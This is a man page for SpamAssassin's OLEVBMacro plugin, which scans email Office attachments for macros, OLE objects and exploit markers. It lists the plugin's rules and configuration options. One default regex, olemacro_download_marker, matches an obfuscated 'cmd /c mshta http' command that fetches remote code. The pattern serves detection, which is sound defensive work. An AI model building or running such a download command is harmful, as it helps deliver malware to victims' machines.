GSP
Quick Navigator

Search Site

Unix VPS
A - Starter
B - Basic
C - Preferred
D - Commercial
MPS - Dedicated
Previous VPSs
* Sign Up! *

Support
Contact Us
Online Help
Handbooks
Domain Status
Man Pages

FAQ
Virtual Servers
Pricing
Billing
Technical

Network
Facilities
Connectivity
Topology Map

Miscellaneous
Server Agreement
Year 2038
Credits
 

USA Flag

 

 

Man Pages
Mail::SpamAssassin::Plugin::OLEVBMacro(3) User Contributed Perl Documentation Mail::SpamAssassin::Plugin::OLEVBMacro(3)

Mail::SpamAssassin::Plugin::OLEVBMacro - scan Office documents for evidence of OLE Macros or other exploits

  loadplugin Mail::SpamAssassin::Plugin::OLEVBMacro

  ifplugin Mail::SpamAssassin::Plugin::OLEVBMacro
    body     OLEMACRO eval:check_olemacro()
    describe OLEMACRO Attachment has an Office Macro

    body     OLEOBJ eval:check_oleobject()
    describe OLEOBJ Attachment has an Ole Object

    body     OLERTF eval:check_olertfobject()
    describe OLERTF Attachment has an Ole Rtf Object

    body     OLEMACRO_MALICE eval:check_olemacro_malice()
    describe OLEMACRO_MALICE Potentially malicious Office Macro

    body     OLEMACRO_ENCRYPTED eval:check_olemacro_encrypted()
    describe OLEMACRO_ENCRYPTED Has an Office doc that is encrypted

    body     OLEMACRO_RENAME eval:check_olemacro_renamed()
    describe OLEMACRO_RENAME Has an Office doc that has been renamed

    body     OLEMACRO_ZIP_PW eval:check_olemacro_zip_password()
    describe OLEMACRO_ZIP_PW Has an Office doc that is password protected in a zip

    body     OLEMACRO_CSV eval:check_olemacro_csv()
    describe OLEMACRO_CSV Malicious csv file that tries to exec cmd.exe detected

    body     OLEMACRO_DOWNLOAD_EXE eval:check_olemacro_download_exe()
    describe OLEMACRO_DOWNLOAD_EXE Malicious code inside the Office doc that tries to download a .exe file detected

    body     OLEMACRO_URI_TARGET eval:check_olemacro_redirect_uri()
    describe OLEMACRO_URI_TARGET Uri inside an Office doc

    body     OLEMACRO_MHTML_TARGET eval:check_olemacro_mhtml_uri()
    describe OLEMACRO_MHTML_TARGET Exploitable mhtml uri inside an Office doc
  endif

This plugin detects OLE Macros or other exploits inside Office documents attached to emails. It can detect documents inside zip files as well as encrypted documents.

This plugin requires Archive::Zip and IO::String perl modules.

The following options can be used in both site-wide ("local.cf") and user-specific ("user_prefs") configuration files to customize how the module handles attached documents
olemacro_num_mime (default: 5)
Configure the maximum number of matching MIME parts (attachments) the plugin will scan.
olemacro_num_zip (default: 8)
Configure the maximum number of matching files inside the zip to scan. To disable zip scanning, set 0.
olemacro_zip_depth (default: 2)
Depth to recurse within zip files.
olemacro_extended_scan ( 0 | 1 ) (default: 0)
Scan all files for potential office files and/or macros, the "olemacro_skip_exts" parameter will still be honored. This parameter is off by default, this option is needed only to run "eval:check_olemacro_renamed" rule. If this is turned on consider adjusting values for "olemacro_num_mime" and "olemacro_num_zip" and prepare for more CPU overhead.
olemacro_prefer_contentdisposition ( 0 | 1 ) (default: 1)
Choose if the content-disposition header filename be preferred if ambiguity is encountered whilst trying to get filename.
olemacro_max_file (default: 1024000)
Limit the amount of bytes that the plugin will decode and scan from the MIME objects (attachments).
olemacro_exts (default: (?:doc|docx|dot|pot|ppa|pps|ppt|rtf|sldm|xl|xla|xls|xlsx|xlt|xltx|xslb)$)
Set the case-insensitive regexp used to configure the extensions the plugin targets for macro scanning.
olemacro_macro_exts (default: (?:docm|dotm|ppam|potm|ppst|ppsm|pptm|sldm|xlm|xlam|xlsb|xlsm|xltm|xps)$)
Set the case-insensitive regexp used to configure the extensions the plugin treats as containing a macro.
olemacro_skip_exts (default: (?:dotx|potx|ppsx|pptx|sldx)$)
Set the case-insensitive regexp used to configure extensions for the plugin to skip entirely, these should only be guaranteed macro free files.
olemacro_skip_ctypes (default: ^(?:text\/))
Set the case-insensitive regexp used to configure content types for the plugin to skip entirely, these should only be guaranteed macro free.
olemacro_zips (default: (?:zip)$)
Set the case-insensitive regexp used to configure extensions for the plugin to target as zip files, files listed in configs above are also tested for zip.
olemacro_download_marker (default: (?:cmd(?:\.exe)? \/c ms\^h\^ta ht\^tps?:\/\^\/))
Set the case-insensitive regexp used to match the script used to download files from the Office document.
2022-03-21 perl v5.32.1

Search for    or go to Top of page |  Section 3 |  Main Index

Powered by GSP Visit the GSP FreeBSD Man Page Interface.
Output converted with ManDoc.